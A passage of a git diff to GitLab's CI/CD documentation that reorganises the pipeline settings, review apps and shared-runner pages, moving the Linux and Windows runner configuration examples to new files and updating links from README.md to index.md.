-- For **public** projects, anyone can view the pipelines, but only members - (reporter or higher) can access the related features. -- For **internal** projects, any logged in user except [external users](../../user/permissions.md#external-users) can view the pipelines. - However, only members (reporter or higher) can access the job related features. -- For **private** projects, only project members (reporter or higher) - can view the pipelines or access the related features. - -## Auto-cancel redundant pipelines - -You can set pending or running pipelines to cancel automatically when a new pipeline runs on the same branch. You can enable this in the project settings: - -1. Go to **Settings > CI/CD**. -1. Expand **General Pipelines**. -1. Check the **Auto-cancel redundant pipelines** checkbox. -1. Click **Save changes**. - -Use the [`interruptible`](../yaml/README.md#interruptible) keyword to indicate if a -running job can be cancelled before it completes. - -## Skip outdated deployment jobs - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/25276) in GitLab 12.9. +## Pipeline badges -Your project may have multiple concurrent deployment jobs that are -scheduled to run in the same time frame. +Pipeline badges indicate the pipeline status and a test coverage value +for your project. These badges are determined by the latest successful pipeline. -This can lead to a situation where an older deployment job runs after a -newer one, which may not be what you want. +### View the code for the pipeline status and coverage reports badges -To avoid this scenario: +You can view the exact link for your badges. Then you can embed the badge in your HTML +or Markdown pages. -1. Go to **Settings > CI/CD**. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. 1. Expand **General pipelines**. -1. Check the **Skip outdated deployment jobs** checkbox. -1. Click **Save changes**. - -When enabled, any older deployments job are skipped when a new deployment starts. - -For more information, see [Deployment safety](../environments/deployment_safety.md). - -## Retry outdated jobs - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211339) in GitLab 13.6. - -A deployment job can fail because a newer one has run. If you retry the failed deployment job, the -environment could be overwritten with older source code. If you click **Retry**, a modal warns you -about this and asks for confirmation. - -For more information, see [Deployment safety](../environments/deployment_safety.md). - -## Pipeline Badges - -In the pipelines settings page you can find pipeline status and test coverage -badges for your project. The latest successful pipeline is used to read -the pipeline status and test coverage values. - -Visit the pipelines settings page in your project to see the exact link to -your badges. You can also see ways to embed the badge image in your HTML or Markdown -pages. +1. In the **Pipeline status** or **Coverage report** sections, view the URLs for the images.  @@ -286,7 +315,7 @@ Depending on the status of your pipeline, a badge can have the following values: - `canceled` - `unknown` -You can access a pipeline status badge image using the following link: +You can access a pipeline status badge image by using the following link: ```plaintext https://gitlab.example.com/<namespace>/<project>/badges/<branch>/pipeline.svg @@ -294,7 +323,7 @@ https://gitlab.example.com/<namespace>/<project>/badges/<branch>/pipeline.svg #### Display only non-skipped status -If you want the pipeline status badge to only display the last non-skipped status, you can use the `?ignore_skipped=true` query parameter: +To make the pipeline status badge display only the last non-skipped status, use the `?ignore_skipped=true` query parameter: ```plaintext https://gitlab.example.com/<namespace>/<project>/badges/<branch>/pipeline.svg?ignore_skipped=true @@ -302,20 +331,20 @@ https://gitlab.example.com/<namespace>/<project>/badges/<branch>/pipeline.svg?ig ### Test coverage report badge -GitLab makes it possible to define the regular expression for the [coverage report](#test-coverage-parsing), +You can define the regular expression for the [coverage report](#add-test-coverage-results-to-a-merge-request) that each job log is matched against. This means that each job in the pipeline can have the test coverage percentage value defined. -The test coverage badge can be accessed using following link: +To access the test coverage badge, use the following link: ```plaintext https://gitlab.example.com/<namespace>/<project>/badges/<branch>/coverage.svg ``` -If you would like to get the coverage report from a specific job, you can add +To get the coverage report from a specific job, add the `job=coverage_job_name` parameter to the URL. For example, the following Markdown code embeds the test coverage report badge of the `coverage` job -into your `README.md`: +in your `README.md`: ```markdown  diff --git a/doc/ci/quick_start/README.md b/doc/ci/quick_start/README.md deleted file mode 100644 index 577a80407d7..00000000000 --- a/doc/ci/quick_start/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/quick_start/index.md b/doc/ci/quick_start/index.md index 225794aec17..8d800d49be3 100644 --- a/doc/ci/quick_start/index.md +++ b/doc/ci/quick_start/index.md @@ -142,7 +142,7 @@ The pipeline starts when the commit is committed. - You can also use [CI/CD configuration visualization](../pipeline_editor/index.md#visualize-ci-configuration) to view a graphical representation of your `.gitlab-ci.yml` file. - For the complete `.gitlab-ci.yml` syntax, see - [the `.gitlab-ci.yml` reference topic](../yaml/README.md). + [the `.gitlab-ci.yml` reference topic](../yaml/index.md). ### View the status of your pipeline and jobs diff --git a/doc/ci/review_apps/index.md b/doc/ci/review_apps/index.md index a64efd50f6f..1ed736de1e8 100644 --- a/doc/ci/review_apps/index.md +++ b/doc/ci/review_apps/index.md @@ -22,7 +22,7 @@ Review Apps: - Provide an automatic live preview of changes made in a feature branch by spinning up a dynamic environment for your merge requests. - Allow designers and product managers to see your changes without needing to check out your branch and run your changes in a sandbox environment. -- Are fully integrated with the [GitLab DevOps LifeCycle](../../README.md#the-entire-devops-lifecycle). +- Are fully integrated with the [GitLab DevOps LifeCycle](../../index.md#the-entire-devops-lifecycle). - Allow you to deploy your changes wherever you want.  @@ -62,7 +62,7 @@ The process of configuring Review Apps is as follows: 1. Set up the infrastructure to host and deploy the Review Apps (check the [examples](#review-apps-examples) below). 1. [Install](https://docs.gitlab.com/runner/install/) and [configure](https://docs.gitlab.com/runner/commands/) a runner to do deployment. -1. Set up a job in `.gitlab-ci.yml` that uses the [predefined CI/CD variable](../variables/README.md) `${CI_COMMIT_REF_NAME}` +1. Set up a job in `.gitlab-ci.yml` that uses the [predefined CI/CD variable](../variables/index.md) `${CI_COMMIT_REF_NAME}` to create dynamic environments and restrict it to run only on branches. Alternatively, you can get a YML template for this job by [enabling review apps](#enable-review-apps-button) for your project. 1. Optionally, set a job that [manually stops](../environments/index.md#stopping-an-environment) the Review Apps. @@ -224,7 +224,7 @@ To see Visual reviews in action, see the [Visual Reviews Walk through](https://y ### Configure Review Apps for Visual Reviews The feedback form is served through a script you add to pages in your Review App. -If you have [Developer permissions](../../user/permissions.md) to the project, +If you have the [Developer role](../../user/permissions.md) in the project, you can access it by clicking the **Review** button in the **Pipeline** section of the merge request. The form modal also shows a dropdown for changed pages if [route maps](#route-maps) are configured in the project. @@ -254,7 +254,7 @@ to replace those values at runtime when each review app is created: variable. - `data-merge-request-id` is the merge request ID, which can be found by the `CI_MERGE_REQUEST_IID` variable. `CI_MERGE_REQUEST_IID` is available only if - [`only: [merge_requests]`](../merge_request_pipelines/index.md) + [`only: [merge_requests]`](../pipelines/merge_request_pipelines.md) is used and the merge request is created. - `data-mr-url` is the URL of the GitLab instance and is the same for all review apps. diff --git a/doc/ci/runners/README.md b/doc/ci/runners/README.md index 45113c480c7..5ab8653dc35 100644 --- a/doc/ci/runners/README.md +++ b/doc/ci/runners/README.md @@ -1,289 +1,8 @@ --- -stage: Verify -group: Runner -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference +redirect_to: 'index.md' --- -# GitLab SaaS runners +This document was moved to [another location](index.md). -If you are using self-managed GitLab or you want to use your own runners on GitLab.com, you can -[install and configure your own runners](https://docs.gitlab.com/runner/install/). - -If you are using GitLab SaaS (GitLab.com), your CI jobs automatically run on shared runners. No configuration is required. -Your jobs can run on [Linux](#linux-shared-runners) or [Windows](#windows-shared-runners-beta). - -The number of minutes you can use on these shared runners depends on your -[quota](../../user/admin_area/settings/continuous_integration.md#shared-runners-pipeline-minutes-quota), -which depends on your [subscription plan](../../subscriptions/gitlab_com/index.md#ci-pipeline-minutes). - -## Linux shared runners - -Linux shared runners on GitLab.com run in autoscale mode and are powered by Google Cloud Platform. - -Autoscaling means reduced queue times to spin up CI/CD jobs, and isolated VMs for each job, thus maximizing security. These shared runners are available for users and customers on GitLab.com. - -GitLab offers Ultimate tier capabilities and included CI/CD minutes per group per month for our [Open Source](https://about.gitlab.com/solutions/open-source/join/), [Education](https://about.gitlab.com/solutions/education/), and [Startups](https://about.gitlab.com/solutions/startups/) programs. For private projects, GitLab offers various [plans](https://about.gitlab.com/pricing/), starting with a Free tier. - -All your CI/CD jobs run on [n1-standard-1 instances](https://cloud.google.com/compute/docs/machine-types) with 3.75GB of RAM, CoreOS and the latest Docker Engine -installed. Instances provide 1 vCPU and 25GB of HDD disk space. The default -region of the VMs is US East1. -Each instance is used only for one job, this ensures any sensitive data left on the system can't be accessed by other people their CI jobs. - -The `gitlab-shared-runners-manager-X.gitlab.com` fleet of runners are dedicated for GitLab projects as well as community forks of them. They use a slightly larger machine type (n1-standard-2) and have a bigger SSD disk size. They don't run untagged jobs and unlike the general fleet of shared runners, the instances are re-used up to 40 times. - -Jobs handled by the shared runners on GitLab.com (`shared-runners-manager-X.gitlab.com`), -**time out after 3 hours**, regardless of the timeout configured in a -project. Check the issues [4010](https://gitlab.com/gitlab-com/infrastructure/-/issues/4010) and [4070](https://gitlab.com/gitlab-com/infrastructure/-/issues/4070) for the reference. - -Below are the shared runners settings. - -| Setting | GitLab.com | Default | -| ----------- | ----------------- | ---------- | -| [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) | [Runner versions dashboard](https://dashboards.gitlab.com/d/000000159/ci?from=now-1h&to=now&refresh=5m&orgId=1&panelId=12&fullscreen&theme=light) | - | -| Executor | `docker+machine` | - | -| Default Docker image | `ruby:2.5` | - | -| `privileged` (run [Docker in Docker](https://hub.docker.com/_/docker/)) | `true` | `false` | - -### Pre-clone script - -Linux shared runners on GitLab.com provide a way to run commands in a CI -job before the runner attempts to run `git init` and `git fetch` to -download a GitLab repository. The -[`pre_clone_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) -can be used for: - -- Seeding the build directory with repository data -- Sending a request to a server -- Downloading assets from a CDN -- Any other commands that must run before the `git init` - -To use this feature, define a [CI/CD variable](../../ci/variables/README.md#custom-cicd-variables) called -`CI_PRE_CLONE_SCRIPT` that contains a bash script. - -[This example](../../development/pipelines.md#pre-clone-step) -demonstrates how you might use a pre-clone step to seed the build -directory. - -### `config.toml` - -The full contents of our `config.toml` are: - -NOTE: -Settings that are not public are shown as `X`. - -**Google Cloud Platform** - -```toml -concurrent = X -check_interval = 1 -metrics_server = "X" -sentry_dsn = "X" - -[[runners]] - name = "docker-auto-scale" - request_concurrency = X - url = "https://gitlab.com/" - token = "SHARED_RUNNER_TOKEN" - pre_clone_script = "eval \"$CI_PRE_CLONE_SCRIPT\"" - executor = "docker+machine" - environment = [ - "DOCKER_DRIVER=overlay2", - "DOCKER_TLS_CERTDIR=" - ] - limit = X - [runners.docker] - image = "ruby:2.5" - privileged = true - volumes = [ - "/certs/client", - "/dummy-sys-class-dmi-id:/sys/class/dmi/id:ro" # Make kaniko builds work on GCP. - ] - [runners.machine] - IdleCount = 50 - IdleTime = 3600 - MaxBuilds = 1 # For security reasons we delete the VM after job has finished so it's not reused. - MachineName = "srm-%s" - MachineDriver = "google" - MachineOptions = [ - "google-project=PROJECT", - "google-disk-size=25", - "google-machine-type=n1-standard-1", - "google-username=core", - "google-tags=gitlab-com,srm", - "google-use-internal-ip", - "google-zone=us-east1-d", - "engine-opt=mtu=1460", # Set MTU for container interface, for more information check https://gitlab.com/gitlab-org/gitlab-runner/-/issues/3214#note_82892928 - "google-machine-image=PROJECT/global/images/IMAGE", - "engine-opt=ipv6", # This will create IPv6 interfaces in the containers. - "engine-opt=fixed-cidr-v6=fc00::/7", - "google-operation-backoff-initial-interval=2" # Custom flag from forked docker-machine, for more information check https://github.com/docker/machine/pull/4600 - ] - [[runners.machine.autoscaling]] - Periods = ["* * * * * sat,sun *"] - Timezone = "UTC" - IdleCount = 70 - IdleTime = 3600 - [[runners.machine.autoscaling]] - Periods = ["* 30-59 3 * * * *", "* 0-30 4 * * * *"] - Timezone = "UTC" - IdleCount = 700 - IdleTime = 3600 - [runners.cache] - Type = "gcs" - Shared = true - [runners.cache.gcs] - CredentialsFile = "/path/to/file" - BucketName = "bucket-name" -``` - -## Windows shared runners (beta) - -The Windows shared runners are in [beta](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta) -and shouldn't be used for production workloads. - -During this beta period, the [shared runner pipeline quota](../../user/admin_area/settings/continuous_integration.md#shared-runners-pipeline-minutes-quota) -applies for groups and projects in the same manner as Linux runners. This may -change when the beta period ends, as discussed in this [related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/30834). - -Windows shared runners on GitLab.com autoscale by launching virtual machines on -the Google Cloud Platform. This solution uses an -[autoscaling driver](https://gitlab.com/gitlab-org/ci-cd/custom-executor-drivers/autoscaler/tree/master/docs/readme.md) -developed by GitLab for the [custom executor](https://docs.gitlab.com/runner/executors/custom.html). -Windows shared runners execute your CI/CD jobs on `n1-standard-2` instances with -2 vCPUs and 7.5 GB RAM. You can find a full list of available Windows packages in -the [package documentation](https://gitlab.com/gitlab-org/ci-cd/shared-runners/images/gcp/windows-containers/blob/master/cookbooks/preinstalled-software/README.md). - -We want to keep iterating to get Windows shared runners in a stable state and -[generally available](https://about.gitlab.com/handbook/product/gitlab-the-product/#generally-available-ga). -You can follow our work towards this goal in the -[related epic](https://gitlab.com/groups/gitlab-org/-/epics/2162). - -### Configuration - -The full contents of our `config.toml` are: - -NOTE: -Settings that aren't public are shown as `X`. - -```toml -concurrent = X -check_interval = 3 - -[[runners]] - name = "windows-runner" - url = "https://gitlab.com/" - token = "TOKEN" - executor = "custom" - builds_dir = "C:\\GitLab-Runner\\builds" - cache_dir = "C:\\GitLab-Runner\\cache" - shell = "powershell" - [runners.custom] - config_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" - config_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "config"] - prepare_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" - prepare_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "prepare"] - run_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" - run_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "run"] - cleanup_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" - cleanup_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "cleanup"] -``` - -The full contents of our `autoscaler/config.toml` are: - -```toml -Provider = "gcp" -Executor = "winrm" -OS = "windows" -LogLevel = "info" -LogFormat = "text" -LogFile = "C:\\GitLab-Runner\\autoscaler\\autoscaler.log" -VMTag = "windows" - -[GCP] - ServiceAccountFile = "PATH" - Project = "some-project-df9323" - Zone = "us-east1-c" - MachineType = "n1-standard-2" - Image = "IMAGE" - DiskSize = 50 - DiskType = "pd-standard" - Subnetwork = "default" - Network = "default" - Tags = ["TAGS"] - Username = "gitlab_runner" - -[WinRM] - MaximumTimeout = 3600 - ExecutionMaxRetries = 0 - -[ProviderCache] - Enabled = true - Directory = "C:\\GitLab-Runner\\autoscaler\\machines" -``` - -### Example - -Below is a simple `.gitlab-ci.yml` file to show how to start using the -Windows shared runners: - -```yaml -.shared_windows_runners: - tags: - - shared-windows - - windows - - windows-1809 - -stages: - - build - - test - -before_script: - - Set-Variable -Name "time" -Value (date -Format "%H:%m") - - echo ${time} - - echo "started by ${GITLAB_USER_NAME}" - -build: - extends: - - .shared_windows_runners - stage: build - script: - - echo "running scripts in the build job" - -test: - extends: - - .shared_windows_runners - stage: test - script: - - echo "running scripts in the test job" -``` - -### Limitations and known issues - -- All the limitations mentioned in our [beta - definition](https://about.gitlab.com/handbook/product/#beta). -- The average provisioning time for a new Windows VM is 5 minutes. - This means that you may notice slower build start times - on the Windows shared runner fleet during the beta. In a future - release we intend to update the autoscaler to enable - the pre-provisioning of virtual machines. This is intended to significantly reduce - the time it takes to provision a VM on the Windows fleet. You can - follow along in the [related issue](https://gitlab.com/gitlab-org/ci-cd/custom-executor-drivers/autoscaler/-/issues/32). -- The Windows shared runner fleet may be unavailable occasionally - for maintenance or updates. -- The Windows shared runner virtual machine instances do not use the - GitLab Docker executor. This means that you can't specify - [`image`](../../ci/yaml/README.md#image) or [`services`](../../ci/yaml/README.md#services) in - your pipeline configuration. -- For the beta release, we have included a set of software packages in - the base VM image. If your CI job requires additional software that's - not included in this list, then you must add installation - commands to [`before_script`](../../ci/yaml/README.md#before_script) or [`script`](../../ci/yaml/README.md#script) to install the required - software. Note that each job runs on a new VM instance, so the - installation of additional software packages needs to be repeated for - each job in your pipeline. -- The job may stay in a pending state for longer than the - Linux shared runners. -- There is the possibility that we introduce breaking changes which will - require updates to pipelines that are using the Windows shared runner - fleet. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/runners/build_cloud/linux_build_cloud.md b/doc/ci/runners/build_cloud/linux_build_cloud.md new file mode 100644 index 00000000000..710054921ef --- /dev/null +++ b/doc/ci/runners/build_cloud/linux_build_cloud.md @@ -0,0 +1,127 @@ +--- +stage: Verify +group: Runner +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Linux shared runners + +Linux shared runners on GitLab.com run in autoscale mode and are powered by Google Cloud Platform. + +Autoscaling means reduced queue times to spin up CI/CD jobs, and isolated VMs for each job, thus maximizing security. These shared runners are available for users and customers on GitLab.com. + +GitLab offers Ultimate tier capabilities and included CI/CD minutes per group per month for our [Open Source](https://about.gitlab.com/solutions/open-source/join/), [Education](https://about.gitlab.com/solutions/education/), and [Startups](https://about.gitlab.com/solutions/startups/) programs. For private projects, GitLab offers various [plans](https://about.gitlab.com/pricing/), starting with a Free tier. + +All your CI/CD jobs run on [n1-standard-1 instances](https://cloud.google.com/compute/docs/machine-types) with 3.75GB of RAM, CoreOS and the latest Docker Engine +installed. Instances provide 1 vCPU and 25GB of HDD disk space. The default +region of the VMs is US East1. +Each instance is used only for one job, this ensures any sensitive data left on the system can't be accessed by other people their CI jobs. + +The `gitlab-shared-runners-manager-X.gitlab.com` fleet of runners are dedicated for GitLab projects as well as community forks of them. They use a slightly larger machine type (n1-standard-2) and have a bigger SSD disk size. They don't run untagged jobs and unlike the general fleet of shared runners, the instances are re-used up to 40 times. + +Jobs handled by the shared runners on GitLab.com (`shared-runners-manager-X.gitlab.com`), +**time out after 3 hours**, regardless of the timeout configured in a +project. Check the issues [4010](https://gitlab.com/gitlab-com/infrastructure/-/issues/4010) and [4070](https://gitlab.com/gitlab-com/infrastructure/-/issues/4070) for the reference. + +Below are the shared runners settings. + +| Setting | GitLab.com | Default | +| ----------- | ----------------- | ---------- | +| Executor | `docker+machine` | - | +| Default Docker image | `ruby:2.5` | - | +| `privileged` (run [Docker in Docker](https://hub.docker.com/_/docker/)) | `true` | `false` | + +## Pre-clone script + +Linux shared runners on GitLab.com provide a way to run commands in a CI +job before the runner attempts to run `git init` and `git fetch` to +download a GitLab repository. The +[`pre_clone_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) +can be used for: + +- Seeding the build directory with repository data +- Sending a request to a server +- Downloading assets from a CDN +- Any other commands that must run before the `git init` + +To use this feature, define a [CI/CD variable](../../../ci/variables/index.md#custom-cicd-variables) called +`CI_PRE_CLONE_SCRIPT` that contains a bash script. + +[This example](../../../development/pipelines.md#pre-clone-step) +demonstrates how you might use a pre-clone step to seed the build +directory. + +NOTE: +The `CI_PRE_CLONE_SCRIPT` variable does not work on Windows runners. + +## `config.toml` + +The full contents of our `config.toml` are: + +NOTE: +Settings that are not public are shown as `X`. + +**Google Cloud Platform** + +```toml +concurrent = X +check_interval = 1 +metrics_server = "X" +sentry_dsn = "X" + +[[runners]] + name = "docker-auto-scale" + request_concurrency = X + url = "https://gitlab.com/" + token = "SHARED_RUNNER_TOKEN" + pre_clone_script = "eval \"$CI_PRE_CLONE_SCRIPT\"" + executor = "docker+machine" + environment = [ + "DOCKER_DRIVER=overlay2", + "DOCKER_TLS_CERTDIR=" + ] + limit = X + [runners.docker] + image = "ruby:2.5" + privileged = true + volumes = [ + "/certs/client", + "/dummy-sys-class-dmi-id:/sys/class/dmi/id:ro" # Make kaniko builds work on GCP. + ] + [runners.machine] + IdleCount = 50 + IdleTime = 3600 + MaxBuilds = 1 # For security reasons we delete the VM after job has finished so it's not reused. + MachineName = "srm-%s" + MachineDriver = "google" + MachineOptions = [ + "google-project=PROJECT", + "google-disk-size=25", + "google-machine-type=n1-standard-1", + "google-username=core", + "google-tags=gitlab-com,srm", + "google-use-internal-ip", + "google-zone=us-east1-d", + "engine-opt=mtu=1460", # Set MTU for container interface, for more information check https://gitlab.com/gitlab-org/gitlab-runner/-/issues/3214#note_82892928 + "google-machine-image=PROJECT/global/images/IMAGE", + "engine-opt=ipv6", # This will create IPv6 interfaces in the containers. + "engine-opt=fixed-cidr-v6=fc00::/7", + "google-operation-backoff-initial-interval=2" # Custom flag from forked docker-machine, for more information check https://github.com/docker/machine/pull/4600 + ] + [[runners.machine.autoscaling]] + Periods = ["* * * * * sat,sun *"] + Timezone = "UTC" + IdleCount = 70 + IdleTime = 3600 + [[runners.machine.autoscaling]] + Periods = ["* 30-59 3 * * * *", "* 0-30 4 * * * *"] + Timezone = "UTC" + IdleCount = 700 + IdleTime = 3600 + [runners.cache] + Type = "gcs" + Shared = true + [runners.cache.gcs] + CredentialsFile = "/path/to/file" + BucketName = "bucket-name" +``` diff --git a/doc/ci/runners/build_cloud/windows_build_cloud.md b/doc/ci/runners/build_cloud/windows_build_cloud.md new file mode 100644 index 00000000000..5a85f28e4b9 --- /dev/null +++ b/doc/ci/runners/build_cloud/windows_build_cloud.md @@ -0,0 +1,156 @@ +--- +stage: Verify +group: Runner +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Windows shared runners (beta) + +The Windows shared runners are in [beta](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta) +and shouldn't be used for production workloads. + +During this beta period, the [shared runner pipeline quota](../../../user/admin_area/settings/continuous_integration.md#shared-runners-pipeline-minutes-quota) +applies for groups and projects in the same manner as Linux runners. This may +change when the beta period ends, as discussed in this [related issue](https://gitlab.com/gitlab-org/gitlab/-/issues/30834). + +Windows shared runners on GitLab.com autoscale by launching virtual machines on +the Google Cloud Platform. This solution uses an +[autoscaling driver](https://gitlab.com/gitlab-org/ci-cd/custom-executor-drivers/autoscaler/tree/master/docs/readme.md) +developed by GitLab for the [custom executor](https://docs.gitlab.com/runner/executors/custom.html). +Windows shared runners execute your CI/CD jobs on `n1-standard-2` instances with +2 vCPUs and 7.5 GB RAM. You can find a full list of available Windows packages in +the [package documentation](https://gitlab.com/gitlab-org/ci-cd/shared-runners/images/gcp/windows-containers/blob/master/cookbooks/preinstalled-software/README.md). + +We want to keep iterating to get Windows shared runners in a stable state and +[generally available](https://about.gitlab.com/handbook/product/gitlab-the-product/#generally-available-ga). +You can follow our work towards this goal in the +[related epic](https://gitlab.com/groups/gitlab-org/-/epics/2162). + +## Configuration + +The full contents of our `config.toml` are: + +NOTE: +Settings that aren't public are shown as `X`. + +```toml +concurrent = X +check_interval = 3 + +[[runners]] + name = "windows-runner" + url = "https://gitlab.com/" + token = "TOKEN" + executor = "custom" + builds_dir = "C:\\GitLab-Runner\\builds" + cache_dir = "C:\\GitLab-Runner\\cache" + shell = "powershell" + [runners.custom] + config_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" + config_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "config"] + prepare_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" + prepare_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "prepare"] + run_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" + run_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "run"] + cleanup_exec = "C:\\GitLab-Runner\\autoscaler\\autoscaler.exe" + cleanup_args = ["--config", "C:\\GitLab-Runner\\autoscaler\\config.toml", "custom", "cleanup"] +``` + +The full contents of our `autoscaler/config.toml` are: + +```toml +Provider = "gcp" +Executor = "winrm" +OS = "windows" +LogLevel = "info" +LogFormat = "text" +LogFile = "C:\\GitLab-Runner\\autoscaler\\autoscaler.log" +VMTag = "windows" + +[GCP] + ServiceAccountFile = "PATH" + Project = "some-project-df9323" + Zone = "us-east1-c" + MachineType = "n1-standard-2" + Image = "IMAGE" + DiskSize = 50 + DiskType = "pd-standard" + Subnetwork = "default" + Network = "default" + Tags = ["TAGS"] + Username = "gitlab_runner" + +[WinRM] + MaximumTimeout = 3600 + ExecutionMaxRetries = 0 + +[ProviderCache] + Enabled = true + Directory = "C:\\GitLab-Runner\\autoscaler\\machines" +``` + +## Example + +Below is a simple `.gitlab-ci.yml` file to show how to start using the +Windows shared runners: + +```yaml +.shared_windows_runners: + tags: + - shared-windows + - windows + - windows-1809 + +stages: + - build + - test + +before_script: + - Set-Variable -Name "time" -Value (date -Format "%H:%m") + - echo ${time} + - echo "started by ${GITLAB_USER_NAME}" + +build: + extends: + - .shared_windows_runners + stage: build + script: + - echo "running scripts in the build job" + +test: + extends: + - .shared_windows_runners + stage: test + script: + - echo "running scripts in the test job" +``` + +## Limitations and known issues + +- All the limitations mentioned in our [beta + definition](https://about.gitlab.com/handbook/product/#beta). +- The average provisioning time for a new Windows VM is 5 minutes. + This means that you may notice slower build start times + on the Windows shared runner fleet during the beta. In a future + release we intend to update the autoscaler to enable + the pre-provisioning of virtual machines. This is intended to significantly reduce + the time it takes to provision a VM on the Windows fleet. You can + follow along in the [related issue](https://gitlab.com/gitlab-org/ci-cd/custom-executor-drivers/autoscaler/-/issues/32). +- The Windows shared runner fleet may be unavailable occasionally + for maintenance or updates. +- The Windows shared runner virtual machine instances do not use the + GitLab Docker executor. This means that you can't specify + [`image`](../../../ci/yaml/index.md#image) or [`services`](../../../ci/yaml/index.md#services) in + your pipeline configuration. +- For the beta release, we have included a set of software packages in + the base VM image. If your CI job requires additional software that's + not included in this list, then you must add installation + commands to [`before_script`](../../../ci/yaml/index.md#before_script) or [`script`](../../../ci/yaml/index.md#script) to install the required + software. Note that each job runs on a new VM instance, so the + installation of additional software packages needs to be repeated for + each job in your pipeline. +- The job may stay in a pending state for longer than the + Linux shared runners. +- There is the possibility that we introduce breaking changes which will + require updates to pipelines that are using the Windows shared runner + fleet. diff --git a/doc/ci/runners/configure_runners.md b/doc/ci/runners/configure_runners.md index 775de26b772..2f845a05a4e 100644 --- a/doc/ci/runners/configure_runners.md +++ b/doc/ci/runners/configure_runners.md @@ -10,7 +10,7 @@ type: reference If you have installed your own runners, you can configure and secure them in GitLab. If you need to configure runners on the machine where you installed GitLab Runner, see -[the GitLab Runner documentation](https://docs.gitlab.com/runner/configuration). +[the GitLab Runner documentation](https://docs.gitlab.com/runner/configuration/). ## Manually clear the runner cache @@ -19,14 +19,14 @@ Read [clearing the cache](../caching/index.md#clearing-the-cache). ## Set maximum job timeout for a runner For each runner, you can specify a *maximum job timeout*. This timeout, -if smaller than the [project defined timeout](../pipelines/settings.md#timeout), takes precedence. +if smaller than the [project defined timeout](../pipelines/settings.md#set-a-limit-for-how-long-jobs-can-run), takes precedence. This feature can be used to prevent your shared runner from being overwhelmed by a project that has jobs with a long timeout (for example, one week). When not configured, runners do not override the project timeout. -On GitLab.com, you cannot override the job timeout for shared runners and must use the [project defined timeout](../pipelines/settings.md#timeout). +On GitLab.com, you cannot override the job timeout for shared runners and must use the [project defined timeout](../pipelines/settings.md#set-a-limit-for-how-long-jobs-can-run). To set the maximum job timeout: @@ -90,7 +90,7 @@ To protect or unprotect a runner: 1. Check the **Protected** option. 1. Click **Save changes**. - + ### Forks @@ -146,7 +146,7 @@ the GitLab instance. To determine this: 1. On the left sidebar, select **Overview > Runners**. 1. Find the runner in the table and view the **IP Address** column. - + ### Determine the IP address of a specific runner @@ -169,13 +169,13 @@ GitLab CI tags are not the same as Git tags. GitLab CI tags are associated with Git tags are associated with commits. By tagging a runner for the types of jobs it can handle, you can make sure -shared runners will [only run the jobs they are equipped to run](../yaml/README.md#tags). +shared runners will [only run the jobs they are equipped to run](../yaml/index.md#tags). For instance, at GitLab we have runners tagged with `rails` if they contain the appropriate dependencies to run Rails test suites. When you [register a runner](https://docs.gitlab.com/runner/register/), its default behavior is to **only pick** -[tagged jobs](../yaml/README.md#tags). +[tagged jobs](../yaml/index.md#tags). To change this, you must have the [Owner role](../../user/permissions.md#project-members-permissions) for the project. To make a runner pick untagged jobs: @@ -230,7 +230,7 @@ Example 2: ## Configure runner behavior with variables -You can use [CI/CD variables](../variables/README.md) to configure runner Git behavior +You can use [CI/CD variables](../variables/index.md) to configure runner Git behavior globally or for individual jobs: - [`GIT_STRATEGY`](#git-strategy) @@ -250,7 +250,7 @@ You can also use variables to configure how many times a runner > - `GIT_STRATEGY=none` requires GitLab Runner v1.7+. You can set the `GIT_STRATEGY` used to fetch the repository content, either -globally or per-job in the [`variables`](../yaml/README.md#variables) section: +globally or per-job in the [`variables`](../yaml/index.md#variables) section: ```yaml variables: @@ -258,7 +258,7 @@ variables: ``` There are three possible values: `clone`, `fetch`, and `none`. If left unspecified, -jobs use the [project's pipeline setting](../pipelines/settings.md#git-strategy). +jobs use the [project's pipeline setting](../pipelines/settings.md#choose-the-default-git-strategy). `clone` is the slowest option. It clones the repository from scratch for every job, ensuring that the local working copy is always pristine. @@ -281,7 +281,7 @@ The `kubernetes` executor always clones into an temporary directory. A Git strategy of `none` also re-uses the local working copy, but skips all Git operations normally done by GitLab. GitLab Runner pre-clone scripts are also skipped, if present. This strategy could mean you need to add `fetch` and `checkout` commands -to [your 